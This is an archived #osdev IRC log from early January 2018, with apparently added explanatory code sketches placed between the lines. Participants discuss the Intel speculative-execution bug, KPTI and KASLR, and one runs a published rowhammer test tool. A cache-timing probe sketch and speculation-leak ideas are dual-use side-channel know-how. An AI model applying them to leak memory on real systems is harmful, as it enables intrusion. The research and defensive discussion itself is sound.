http://bespin.org/~qz/search/?view=1&c=osdev&y=18&m=1&d=3

Wednesday, 3 January 2018

00:00:00 --- log: started osdev/18.01.03
00:00:04 --- quit: quc (Remote host closed the connection)
00:00:21 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
00:00:22 --- quit: caen23 (Ping timeout: 248 seconds)
00:05:29 --- join: Barrett (~barrett@unaffiliated/barrett) joined #osdev
00:12:22 --- quit: awang (Ping timeout: 272 seconds)
00:25:26 --- quit: daniele_athome (Ping timeout: 248 seconds)
00:26:32 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
00:30:34 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
00:32:50 --- quit: dbittman (Ping timeout: 246 seconds)
00:35:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
00:41:30 --- quit: caen23 (Ping timeout: 250 seconds)
00:43:37 --- join: regreg (~regreg@85.121.54.224) joined #osdev
00:51:13 --- join: bm371613 (~bartek@2a02:a317:603f:9800:391:ed9f:1c09:1285) joined #osdev
00:58:26 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
01:02:04 --- join: Pseudonym73 (~Pseudonym@210-84-37-58.dyn.iinet.net.au) joined #osdev
01:02:46 --- quit: caen23 (Ping timeout: 248 seconds)
01:05:51 --- quit: mavhq (Read error: Connection reset by peer)
01:07:08 --- join: mavhq (~quassel@cpc77319-basf12-2-0-cust433.12-3.cable.virginm.net) joined #osdev
01:09:50 --- quit: variable (Quit: /dev/null is full)
01:10:32 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:10:37 --- quit: variable (Client Quit)
01:12:09 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:12:09 --- quit: variable (Client Quit)
01:12:45 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:12:56 --- quit: variable (Client Quit)
01:19:06 --- quit: Pseudonym73 (Quit: Leaving...)
01:20:33 --- quit: hmmmm (Remote host closed the connection)
01:23:59 --- quit: nzoueidi (Quit: WeeChat 2.0)
01:28:05 --- join: m3nt4L (~asvos@2a02:587:a019:8300:3285:a9ff:fe8f:665d) joined #osdev
01:28:05 --- quit: m3nt4L (Client Quit)
01:29:19 --- quit: oaken-source (Ping timeout: 256 seconds)
01:31:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
01:31:40 --- quit: Barrett (Quit: exit)
01:37:28 --- quit: caen23 (Ping timeout: 240 seconds)
01:44:30 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
01:44:39 --- quit: raphaelsc (Remote host closed the connection)
01:45:25 <Brnocrist> https://gist.github.com/dougallj/f9ffd7e37db35ee953729491cfb71392
01:45:27 <bslsk05> ​gist.github.com: x86-64 Speculative Execution Harness · GitHub
01:47:59 --- join: paranoidandroid_ (4ea247be@gateway/web/freenode/ip.78.162.71.190) joined #osdev
01:55:17 --- join: Asu (~sdelang@AMarseille-658-1-48-133.w90-37.abo.wanadoo.fr) joined #osdev
02:02:35 --- quit: wcstok (Read error: Connection reset by peer)
02:04:09 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
02:06:42 <__pycache__> apparently intel CEO sold lots of stocks in nov
02:06:52 <__pycache__> which makes me believe that they knew about this at least since then
02:07:50 --- quit: godel (Ping timeout: 248 seconds)
02:08:32 <__pycache__> people wonder about the real reason behind intel's single core power; i'm thinking it's things like this. and the thing is, this actually causes intel systems to go slower than amd systems at this point
02:08:55 <__pycache__> when successfully mitigated
02:09:07 --- quit: caen23 (Ping timeout: 264 seconds)
02:10:05 --- join: vdamewood (~vdamewood@unaffiliated/vdamewood) joined #osdev
02:10:09 <Kazinsal> I usually try to avoid the insider conspiracy speculation but by all accounts the Windows kernel team committed a PTI trampoline to RS4 some time in november
02:15:19 <Kazinsal> And the KAISER/FUCKWIT project has also been in the works since November.
02:16:26 <Kazinsal> In my hopes and dreams Intel's engineering team had a conference call with the Windows kernel leads, the macOS kernel leads, and Linus Torvalds, started recording, told them all about the bug at once, then muted the mic and went for coffee
02:16:37 --- quit: nzoueidi (Quit: WeeChat 2.0)
02:17:22 --- join: OXCC (~doubledip@ip5451817e.direct-adsl.nl) joined #osdev
02:20:56 --- join: glauxosdever (~alex@ppp-94-66-43-97.home.otenet.gr) joined #osdev
02:21:23 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
02:25:58 --- quit: OXCC (Ping timeout: 248 seconds)
02:34:48 <izabera> and came back from coffee without a job
02:34:51 --- quit: KidBeta (Quit: My MacBook Pro has gone to sleep. ZZZzzz…)
02:38:43 --- join: sdfgsdfg (~sdfgsdfg@unaffiliated/sdfgsdfg) joined #osdev
02:41:49 --- join: vmlinuz (vmlinuz@nat/ibm.br/x-lhweahvqfqzcaiwc) joined #osdev
02:41:49 --- quit: vmlinuz (Changing host)
02:41:49 --- join: vmlinuz (vmlinuz@unaffiliated/vmlinuz) joined #osdev
02:44:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
02:50:43 --- quit: caen23 (Ping timeout: 260 seconds)
03:00:27 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
03:00:31 --- join: m_t (~m_t@p5DDA1E9C.dip0.t-ipconnect.de) joined #osdev
03:03:29 <Brnocrist> isn't that fake news about the intel CEO?
03:13:20 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
03:16:08 --- quit: regreg (Ping timeout: 248 seconds)
03:27:38 --- join: alphawarr1or (uid243905@gateway/web/irccloud.com/x-giyrbiwadubebxva) joined #osdev
03:41:14 --- quit: caen23 (Ping timeout: 240 seconds)
03:52:47 --- nick: ExtremeUltraFMan -> PointlessMan
04:07:54 --- join: oaken-source (~oaken-sou@141.89.226.146) joined #osdev
04:10:12 --- quit: dengke (Ping timeout: 268 seconds)
04:10:55 <lava> Kazinsal: we published the first version of the KAISER kernel patch in may
04:11:04 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
04:11:34 <lava> and we already described the idea to do that in a paper mid 2016
04:12:07 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
04:12:28 --- join: dengke (~dengke@106.120.101.38) joined #osdev
04:14:32 --- join: ziongate (~angelo@mittelab/members/ziongate) joined #osdev
04:16:23 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
04:18:05 --- join: Halofreak1990 (~FooBar247@94.208.165.55) joined #osdev
04:28:58 --- join: zng (~zng@ool-18ba49be.dyn.optonline.net) joined #osdev
04:31:37 <Brnocrist> with this paper I guess https://gruss.cc/files/prefetch.pdf
04:32:24 --- join: navidr (uid112413@gateway/web/irccloud.com/x-vhupcdxgqlnqdefr) joined #osdev
04:34:27 --- join: CheckDavid (uid14990@gateway/web/irccloud.com/x-dfikbasdxspykqvo) joined #osdev
04:39:55 --- join: uvgroovy (~uvgroovy@c-65-96-163-219.hsd1.ma.comcast.net) joined #osdev
04:39:57 --- quit: uvgroovy (Remote host closed the connection)
04:40:09 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:5574:74af:c3ae:f99a) joined #osdev
04:43:26 --- quit: immibis (Ping timeout: 272 seconds)
04:44:44 --- quit: sdfgsdfg (Ping timeout: 268 seconds)
04:44:51 <MrOlsen> oh man, clang is killing me... half my binaries are faulting with an invalid opcode
04:46:18 <izabera> what about the other half
04:47:01 <MrOlsen> they are still working!
04:48:04 --- quit: dengke (Read error: Connection timed out)
04:48:12 <izabera> good, now go on and be an optimist
04:48:14 <MrOlsen> i suspect two things... either something in my process initialization is not zeroing out memory so variables/pointers are not zero'd
04:48:42 <MrOlsen> or the relocation tables are not being correctly initialized
04:48:50 <MrOlsen> i'll have to write a quick program to test
04:50:32 <meowrobot> how many layers of indirection is generally "too much"?
04:50:47 <izabera> ***this
04:50:50 <meowrobot> i.e., consider an array of structs, where each struct has a pointer to some random arbitrary struct
04:51:00 <izabera> google 3 star programmer
04:51:33 <meowrobot> interesting
04:53:29 <renopt> MrOlsen: hmm, maybe clang assumes you call the constructor functions
04:53:33 <renopt> like you would in c++
04:54:32 <MrOlsen> yeah, i'm thinking my crtX functions aren't handling the .ctor
04:55:10 <MrOlsen> I'll brb
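A minimal sketch of the kind of fix MrOlsen is heading toward in a hand-rolled crt0, assuming a conventional ELF linker script that provides the __init_array bounds (the symbol names below are the standard toolchain ones, not taken from his code):

    /* Bounds of the constructor pointer array; a conventional ELF
     * linker script provides these around .init_array/.ctors. */
    extern void (*__init_array_start[])(void);
    extern void (*__init_array_end[])(void);

    /* Run every constructor before main(); clang emits entries here
     * for __attribute__((constructor)) functions and C++ globals. */
    static void call_ctors(void)
    {
        for (void (**fn)(void) = __init_array_start; fn < __init_array_end; fn++)
            (*fn)();
    }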
04:56:38 --- join: dengke (~dengke@106.120.101.38) joined #osdev
04:57:32 --- quit: uvgroovy (Quit: uvgroovy)
05:08:09 <MrOlsen> damn it's cold outside
05:08:26 --- quit: daniele_athome (Ping timeout: 250 seconds)
05:08:56 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
05:14:49 --- join: lijero (~lijero@unaffiliated/lijero) joined #osdev
05:20:26 <meowrobot> yeah, googling three-star programmer is showing me information completely tangential to what i'm thinking about :p
05:20:37 <meowrobot> though, point taken about excessive templates...
05:30:04 --- quit: quc (Remote host closed the connection)
05:30:26 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
05:35:59 <meowrobot> okay reading more, it seems three-star programming describes a phenomenon very different from what i'd considered
05:36:03 <meowrobot> good, good
05:39:23 --- join: awang (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
05:50:16 <hydraz> what did you think it was?
05:50:54 <meowrobot> no idea, this is the first time i've heard of the term
05:51:38 <meowrobot> my original question was more along the lines of "how many pointers to pointers can cause undesirable effects, like cache misses"
05:51:44 --- join: fujisan (uid4207@gateway/web/irccloud.com/x-acahzsbntpejfhsi) joined #osdev
05:52:12 <hydraz> ah
05:53:04 <meowrobot> so, i was thinking of a series of data structures that would be an array of structs, with each of these structs containing a pointer to another type of struct, of some arbitrary layout
05:54:45 <izabera> then the answer is 1
05:55:20 <doug16k> MrOlsen, what cpu? on x86 you have to explicitly enable SSE, and the compiler is probably assuming SSE is enabled and available unless you told it otherwise
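For reference, the enable sequence doug16k is alluding to; a minimal sketch using the control register bits documented in the Intel SDM, assuming CPUID has already confirmed SSE support (with CR0.EM still set, SSE instructions raise #UD, i.e. invalid opcode):

    #include <stdint.h>

    /* Enable SSE: clear CR0.EM, set CR0.MP, CR4.OSFXSR, CR4.OSXMMEXCPT. */
    static inline void enable_sse(void)
    {
        uintptr_t cr0, cr4;
        __asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
        cr0 &= ~(uintptr_t)(1 << 2);   /* CR0.EM = 0: no x87 emulation    */
        cr0 |= (1 << 1);               /* CR0.MP = 1: monitor coprocessor */
        __asm__ volatile("mov %0, %%cr0" :: "r"(cr0));
        __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
        cr4 |= (1 << 9);               /* CR4.OSFXSR: FXSAVE/FXRSTOR, SSE  */
        cr4 |= (1 << 10);              /* CR4.OSXMMEXCPT: unmasked #XM     */
        __asm__ volatile("mov %0, %%cr4" :: "r"(cr4));
    }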
05:55:53 <meowrobot> izabera: array.struct, then end there?
05:56:35 <meowrobot> instead of array.struct->struct
05:56:36 <izabera> the point is that you want to minimize unpredictable jumps in memory
05:56:42 <meowrobot> i see
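A small illustration of izabera's point, with hypothetical struct names: the first loop chases a pointer per element to wherever it happens to live, the second walks one contiguous allocation that the prefetcher can follow.

    #include <stddef.h>

    struct payload { int value; };

    struct node_indirect { struct payload *p; };   /* array.struct->struct */
    struct node_flat     { struct payload p;  };   /* array.struct         */

    long sum_indirect(const struct node_indirect *a, size_t n)
    {
        long sum = 0;
        for (size_t i = 0; i < n; i++)
            sum += a[i].p->value;   /* unpredictable jump per element */
        return sum;
    }

    long sum_flat(const struct node_flat *a, size_t n)
    {
        long sum = 0;
        for (size_t i = 0; i < n; i++)
            sum += a[i].p.value;    /* linear, cache-friendly scan */
        return sum;
    }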
05:59:21 <doug16k> MrOlsen, when looking at invalid opcode exceptions, first see if it is at some ridiculous address, and if so, look for a return address after the address in the stack pointer register. second, see if the opcodes are valid but you have not initialized the cpu sufficiently
06:00:03 --- quit: quc (Remote host closed the connection)
06:00:18 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
06:00:40 <doug16k> if you indirect called off an uninitialized vtable, the stack will have a return address in there that points to the instruction following the call
06:04:06 --- quit: awang (Ping timeout: 248 seconds)
06:12:47 <izabera> run it in a debugger
06:20:42 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
06:21:07 --- join: zesterer (~zesterer@cpc138506-newt42-2-0-cust207.19-3.cable.virginm.net) joined #osdev
06:21:47 <zesterer> I've come here to see what you people think of the Intel x86 branch prediction bug. Opinions?
06:23:07 <zesterer> I also saw a comment from someone somewhere that suggested that it might be possible to dedicate a single core to kernel operations and the rest to user-space operations, thereby reducing the overhead required for the workaround (since only one core needs to deal with the whole switch-out-CR3 issue)
06:23:27 <Brnocrist> where did you read it?
06:25:55 --- quit: daniele_athome (Ping timeout: 264 seconds)
06:27:32 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
06:32:45 <bcos_> zesterer: This one: https://arstechnica.com/information-technology/2016/10/flaw-in-intel-chips-could-make-malware-attacks-more-potent/ ?
06:32:47 <bslsk05> ​arstechnica.com: Flaw in Intel chips could make malware attacks more potent | Ars Technica
06:33:11 <zesterer> bcos_: Yes
06:33:33 <zesterer> Brnocrist: Just in the comments section of some article. I was wondering if it's a feasible partial solution.
06:33:47 <bcos_> Seems to be a recent trend - anything that causes a timing difference = "OMG the useless ASLR crap is broken again".. :-)
06:35:41 <grawity> maybe it'll force people to write more efficient programs
06:35:54 <grawity> (lol no it won't)
06:37:19 <zesterer> bcos_: Do you think it's being overstated?
06:37:36 --- quit: osa1 (Ping timeout: 256 seconds)
06:39:38 <bcos_> zesterer: The long story?
06:40:21 --- quit: jack_rabbit (Ping timeout: 265 seconds)
06:42:53 <zesterer> bcos_: Hmmm>
06:42:57 <zesterer> *?
06:42:59 <bcos_> Once upon a time a n00b student decided to write a kernel. His lecturer suggested micro-kernels are better, but the n00b ignored his lecturer. For memory management, the n00b decided to map all physical memory into kernel space "as is" creating a strong relationship between kernel-space addresses and physical addresses (among other problems).
06:43:20 <bcos_> ..fast forward...
06:44:57 <__pycache__> what's #osdev's opinions on go?
06:45:03 <__pycache__> as in golang
06:45:28 <bcos_> Kernel becomes popular for political reasons, address space randomisation broken on a yearly basis. Rowhammer comes out - ASLR (the only real defence they can think of) still broken yearly.
06:45:44 --- quit: oaken-source (Ping timeout: 248 seconds)
06:45:49 <__pycache__> bcos_: i assume that this story began in 1991?
06:45:56 * bcos_ nods
06:46:11 <__pycache__> would the grandpa paradox be worth it
06:46:29 <__pycache__> if you had a timewarp to 1991
06:46:48 <bcos_> I'm not sure which one..
06:46:50 <froggey> you want bcos_ to become linus' grandpa?
06:47:22 <__pycache__> if you destroy your reason for going through time, what happens?
06:47:35 <__pycache__> if you go back in time to undo something
06:47:49 <__pycache__> will time get stuck in a loop?
06:48:15 <bcos_> __pycache__: When I find out, I'll let you know yesterday
06:49:03 <zesterer> bcos_: So as you see it, this is all a fault of not using microkernels?
06:49:09 <froggey> bcos_: what about NT? which afaik doesn't use a direct physical map but is still implementing a similar mitigation
06:50:08 --- join: Darmor (~Tom@198-91-187-5.cpe.distributel.net) joined #osdev
06:50:35 <bcos_> zesterer: Not just that - mapping RAM into kernel space "as is" contributes
06:51:25 <bcos_> froggey: Not sure about NT internals - might just be marketing
06:51:37 <zesterer> bcos_: I'm not sure what you mean. Do you mean mapping the kernel space into userland address tables?
06:51:54 <bcos_> ("oh, our competitors are doing X so I guess people will expect us to match it")
06:51:58 <froggey> a 30% performance penalty is an interesting form of marketing
06:53:02 <bcos_> zesterer: For something like rowhammer (where attacker can manipulate physical addresses) a strong relationship between kernel virtual addresses and physical addresses helps attacker target specific pieces of kernel (if they know kernel virtual addresses)
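Concretely, the relationship bcos_ means: Linux's x86-64 direct map places all of RAM at a constant offset in kernel space, so one leaked direct-map virtual address gives the attacker the physical address by plain subtraction (the base, PAGE_OFFSET, varies by kernel version and configuration):

    phys = virt - PAGE_OFFSET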
06:53:24 --- join: jack_rabbit (~jack_rabb@c-98-228-48-226.hsd1.il.comcast.net) joined #osdev
06:53:31 <__pycache__> i just had someone in #go-nuts recommend RPC over HTTP for plugins for an IRC bot
06:53:31 <__pycache__> i GC paused for 10 seconds
06:55:13 <zesterer> bcos_: Surely there is some stuff that must be kept at fixed addresses though? Or is that largely redundant for modern devices?
06:57:10 <bcos_> zesterer: The only things I can think of that needs a fixed physical address are the firmware's ROM and legacy video frame buffer
06:57:51 <bcos_> D'oh - and BIOS boot code I guess
06:57:53 <zesterer> bcos_: Fair enough. I've not ventured past about 1990 when it comes to PC hardware yet, so I'm not too informed.
06:58:07 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
06:58:18 <zesterer> gtg, thanks for the discussion
06:58:23 <bcos_> :-)
06:58:28 <meowrobot> bcos_: is that to imply *BSD does not have this vulnerability?
06:59:52 <bcos_> For the latest vulnerability, I'm not even sure if it's a vulnerability yet
06:59:55 --- quit: zesterer (Quit: zesterer)
07:00:11 --- quit: CheckDavid (Quit: Connection closed for inactivity)
07:00:43 <bcos_> - the reactions from Linux and Microsoft seem too hasty for "LOL, ASLR is broken again" though
07:02:35 <bcos_> Hrm
07:02:53 <meowrobot> speaking of ASLR, it just occurred to me that would defeat attempts to keep pointers to pointers in relatively predictable spots...
07:02:59 <bcos_> Can't even seem to find out when the "embargo" is supposed to end
07:03:32 <meowrobot> maybe that concern is entirely academic in light of ASLR
07:05:10 <bauen1> so uhm what exactly is the "Ban me, theme can not be unset" i just clicked ?
07:06:50 <bcos_> bauen1: On osdev forums? It's a trap designed to confine a malicous user
07:07:20 <bauen1> uhm bad question: how do i change it back ?
07:07:28 <bcos_> You can't
07:08:03 <bauen1> :/
07:08:30 <bauen1> really ?
07:09:09 <bcos_> Yes - wouldn't be a very good trap if you could escape..
07:09:20 <bcos_> Give me a few minutes I'll see if I can do anything
07:09:23 <bauen1> who tf put it at the top of the list ?
07:12:15 --- join: svk (~svk@port-92-203-6-87.dynamic.qsc.de) joined #osdev
07:13:05 <bcos_> bauen1: See if that helped (not sure if you'll need to log out & log back in)
07:14:31 <bauen1> btw logging out is a bit _difficult_ with that theme
07:14:51 <bauen1> bcos_: thanks
07:16:38 <bcos_> :-)
07:21:06 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
07:21:09 --- quit: uvgroovy (Remote host closed the connection)
07:21:40 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
07:23:08 <vdamewood> I'm kind of curious what's going on there.
07:26:21 <froggey> https://twitter.com/brainsmoke/status/948561799875502080 looks like a read of kernel memory
07:26:22 <bslsk05> ​twitter: <brainsmoke> Bingo! #kpti #intelbug https://pbs.twimg.com/media/DSn30-UW4AEV13B.jpg
07:28:32 <meowrobot> .theo
07:28:32 <glenda> I would like to see some proof of that.
07:28:57 <bcos_> Hrm. "no page faults required".. There was some earlier work on using TSX to avoid the page faults
07:29:26 <bcos_> At least now I know the vulnerability allows reads from kernel space
07:30:40 --- quit: bemeurer (Ping timeout: 255 seconds)
07:31:56 --- join: osa1 (~omer@212.252.142.138) joined #osdev
07:31:56 --- quit: osa1 (Changing host)
07:31:56 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
07:33:14 <doug16k> my bullshit gauge pegs when I read security articles
07:33:36 <bcos_> Mine too - I start out very cynical.. :-)
07:34:10 <bcos_> For this one, I think I've reached the stage of being worried - there's enough bread crumbs to follow
07:34:13 --- join: hmmmm (~sdfgsf@pool-72-79-161-183.sctnpa.east.verizon.net) joined #osdev
07:34:26 --- quit: xenos1984 (Quit: Leaving.)
07:34:55 <doug16k> ok, let's say they have the kernel address, in the clear. put the kernel load address in a text file in a world accessible location. then what?
07:35:07 <doug16k> then rely on _another_ real vulnerability in something to use it?
07:35:56 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
07:36:09 <doug16k> it's like having buttons wired to bombs, and complaining about how the buttons are wired up, and ignoring the bombs
07:37:20 --- quit: inode (Quit: )
07:38:37 <Prf_Jakob> doug16k: Doesn't rowhammer still exist?
07:38:53 <Prf_Jakob> The only fix for it was just moving things around.
07:39:18 <doug16k> hypothetically? sure. have I seen a rowhammer test work on my ram? never
07:40:50 <doug16k> if hypothetical is the bar, then all writes to memory potentially change kernel addresses
07:41:02 <doug16k> writes to dram can affect other unrelated nearby bits
07:41:57 <doug16k> it's called bad memory
07:43:39 <doug16k> if security researchers had their way, we'd live in underground caves lined with titanium and carbide alloy, because meteors
07:44:14 <svk> maybe one could leak kernel memory with something like: mov rax, kerneladdress; cmp rax, $somevalue; hence messing with the branchpredictor so you can guess the value stored there
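svk's sketch has the right instinct; what the published attacks actually do is let a speculative load pull a cache line in and then detect that line with a flush+reload timing probe. A minimal sketch of just the probe half, using GCC/clang x86 intrinsics; the hit/miss cycle threshold is machine-specific and has to be calibrated:

    #include <stdint.h>
    #include <x86intrin.h>

    /* Evict the line holding p from the cache hierarchy. */
    static void flush_line(const void *p)
    {
        _mm_clflush(p);
    }

    /* Time one load of *p in TSC cycles: a small result means the line
     * was already cached, e.g. touched by speculative execution. */
    static uint64_t probe_cycles(const volatile uint8_t *p)
    {
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }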
07:45:26 <Prf_Jakob> On the wikipedia article rowhammer sounds more than just hypothetical.
07:49:13 --- quit: bemeurer (Ping timeout: 252 seconds)
07:51:53 <lava> i have many computers where you can flip bits with rowhammer all the time
07:52:10 <lava> i have 1 where no bits flip
07:52:10 --- quit: osa1 (Ping timeout: 272 seconds)
07:52:22 <lava> most people just don't hammer the right way
07:52:27 <lava> hammering the right way is complicated
07:53:03 <bcos_> Most people should be using ECC :-(
07:55:13 <immersive> https://twitter.com/thegrugq/status/948569897390415872 shit
07:55:14 <bslsk05> ​twitter: <thegrugq> Speculation over. Intel bug has been reproduced with a PoC. [<brainsmoke> Bingo! #kpti #intelbug https://pbs.twimg.com/media/DSn30-UW4AEV13B.jpg ]
07:55:25 <doug16k> get ram with big heat sinks and run it above 1.2V. that greatly reduces the chance of these "voltage fluctuations" going out of spec
07:55:32 <lava> not really
07:55:43 <lava> i investigated the influence of voltage on rowhammer bit flips
07:55:44 --- join: xenos1984 (~xenos1984@22-164-191-90.dyn.estpak.ee) joined #osdev
07:56:03 <lava> no significant effect in either direction
07:56:10 <lava> at least not on rowhammer
07:56:20 <lava> the system just refuses to work beyond some bound
07:56:27 <doug16k> lava, sorry, I don't buy it
07:56:35 <lava> ?
07:56:38 <lava> i did try that
07:56:48 <lava> i assume that the sense amplifiers scale with it
07:57:01 <lava> higher voltage -> sense amplifiers need higher charge to say it's a one
07:57:27 --- join: pictron (~tom@pool-173-79-33-247.washdc.fios.verizon.net) joined #osdev
07:57:33 <doug16k> and higher charge in each cell, so the leakdown will last longer without a refresh cycle
07:57:37 <lava> you would need to change the sense amplifiers threshold alone, that could have an effect, not sure it will
07:57:41 <lava> but
07:58:06 <lava> also with the higher voltage, the sense amplifier needs a higher charge to say it's a zero
07:58:10 <lava> in effect it remains the same
07:58:14 <bcos_> Fact: If you run modern RAM at 1000V no bit will flip ever again! :-)
07:58:15 <lava> i tried that on multiple systems
07:58:37 <lava> went from lower end where it still booted, to upper end where it still booted
07:58:43 <lava> nothing, no significant effect
07:58:49 <lava> else i would already have published that
07:58:57 <lava> i was hoping to find that it has an effect
07:59:00 <lava> but it didn't
07:59:30 <doug16k> lava, got a test program I can run to see rowhammer happening first person?
07:59:41 <doug16k> because assertions don't pull much weight with me
07:59:52 <Prf_Jakob> rowhammer.js?
08:00:02 <Prf_Jakob> It even has a catchy name
08:00:57 <lava> https://github.com/IAIK/rowhammerjs/tree/master/native this one
08:01:02 <bslsk05> ​github.com: rowhammerjs/native at master · IAIK/rowhammerjs · GitHub
08:01:05 <lava> native code, needs root for ideal hammering
08:01:22 <lava> you will still have to fix some constants for your system
08:01:27 <doug16k> really? js? come on
08:01:33 <lava> this one is not js
08:01:45 <lava> this one is C++
08:01:56 <lava> but we kept it all in one repo for that paper
08:02:01 --- join: banisterfiend (~banister@ruby/staff/banisterfiend) joined #osdev
08:02:12 --- join: multi_io_ (~olaf@77.180.93.255) joined #osdev
08:04:45 <doug16k> what should I do on ryzen with DDR4? just make?
08:04:50 --- quit: multi_io (Ping timeout: 240 seconds)
08:05:59 --- quit: uvgroovy (Quit: uvgroovy)
08:06:31 --- quit: svk (Quit: Leaving)
08:08:48 <doug16k> lava, how long should it take?
08:10:00 <lava> never tried ryzen
08:10:06 <lava> no clue what the mapping functions look like there
08:10:11 <lava> DDR4 is generally susceptible though
08:10:30 <garit> https://i.imgur.com/nGGI77r.png - raytracing 1mln rays from a point above the screen. I expected to see a circle of light but i see a square. who's guilty? prng, line-to-plane intersection algorithm, something else?
08:10:37 <lava> i would recommend reverse engineering the mapping functions first: https://github.com/IAIK/drama/tree/master/re
08:10:39 <bslsk05> ​github.com: drama/re at master · IAIK/drama · GitHub
08:10:48 <lava> then put these mapping functions in the rowhammer tool
08:10:53 <lava> and then you can see whether a bit flips
08:11:10 <lava> i have machines with bit flip rates ranging from multiple hundred per second to 3 per 24 hours
08:11:21 --- join: R3x_ (uid181433@gateway/web/irccloud.com/x-lqnknpuktgiomqla) joined #osdev
08:12:01 --- quit: glauxosdever (Quit: leaving)
08:13:10 <doug16k> lava, why would they require root?
08:13:34 <doug16k> you don't need rowhammer with root
08:14:39 --- join: osa1 (~omer@212.252.142.138) joined #osdev
08:14:39 --- quit: osa1 (Changing host)
08:14:39 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
08:17:00 <doug16k> measure aborts with assertion: measure: measure.cpp:94: void setupMapping(): Assertion `mapping != (void *) -1' failed.
08:18:20 --- join: freakazoid0223 (~IceChat9@pool-108-52-4-148.phlapa.fios.verizon.net) joined #osdev
08:18:54 <lava> ...
08:18:56 <lava> needs root
08:19:00 <lava> for physical address information
08:19:06 <lava> you're not trying to mount a real attack here
08:19:07 <doug16k> ya still asserts with root
08:19:12 <lava> uh
08:19:14 <lava> not linux?
08:19:17 <doug16k> linux
08:19:31 <doug16k> had to give tiny memory percentage to avoid assertion
08:19:48 <doug16k> 32 GB machine
08:19:56 <lava> ah
08:19:56 <lava> yes
08:21:27 --- join: grzesiek (~grzesiek@PC-77-46-101-67.euro-net.pl) joined #osdev
08:21:33 <doug16k> in case you're interested, 1% failed, 0.1% runs
08:25:47 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
08:28:43 <doug16k> oh I see the problem. the command line help says "percentage" but it is really a multiplier
08:28:55 <doug16k> 1 = 100%
08:29:55 --- quit: fujisan (Quit: Connection closed for inactivity)
08:32:17 <mawk> lol
08:32:39 --- join: vaibhav (~vnagare@125.16.97.124) joined #osdev
08:36:30 --- quit: bemeurer (Ping timeout: 272 seconds)
08:37:53 <doug16k> lava, surely you have seen machines that run it indefinitely with zero flips, right?
08:39:02 --- quit: dengke (Ping timeout: 250 seconds)
08:39:45 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
08:40:18 --- join: dengke (~dengke@106.120.101.38) joined #osdev
08:43:24 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
08:43:37 --- quit: vdamewood (Quit: Textual IRC Client: www.textualapp.com)
08:44:52 --- quit: uvgroovy (Client Quit)
08:45:04 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
08:45:42 --- quit: voidah (Ping timeout: 248 seconds)
08:47:00 --- quit: qeos|2 (Read error: Connection reset by peer)
08:47:15 --- join: wcstok (~Me@c-71-197-192-147.hsd1.wa.comcast.net) joined #osdev
08:47:16 --- quit: bm371613 (Quit: Konversation terminated!)
08:47:23 --- join: qeos|2 (~qeos@ppp158-255-171-31.pppoe.spdop.ru) joined #osdev
08:49:22 <lava> yes
08:49:33 <lava> a small percentage of systems
08:49:41 <lava> maybe like 20% of systems
08:51:29 <doug16k> lava, I got this: https://gist.github.com/doug65536/c4abec923c502dc5c383e9c7aac6afd6
08:51:31 <bslsk05> ​gist.github.com: gist:c4abec923c502dc5c383e9c7aac6afd6 · GitHub
08:51:56 <doug16k> does that mean I add a #if to get_dram_mapping which lists the 100% ones?
08:57:25 --- quit: bemeurer (Ping timeout: 252 seconds)
08:59:02 <lava> looks inconclusive
08:59:12 <lava> that's too many 100% cases i would say
08:59:19 <lava> these are side channel attacks, they are inherently noisy
08:59:31 <lava> i exchanged emails with one student a few weeks ago
08:59:47 <lava> he worked on this for like 3-4 weeks to finally get the dram functions of his system
09:00:44 --- join: bcos (~bcos@1.123.132.248) joined #osdev
09:02:04 <doug16k> ah
09:04:19 --- quit: bcos_ (Ping timeout: 264 seconds)
09:04:53 --- join: John__ (~John__@79.97.140.214) joined #osdev
09:08:38 --- quit: Darmor (Ping timeout: 248 seconds)
09:08:43 --- quit: bauen1 (Ping timeout: 265 seconds)
09:18:45 --- part: bipul left #osdev
09:21:17 --- join: voidah (~voidah@unaffiliated/voider) joined #osdev
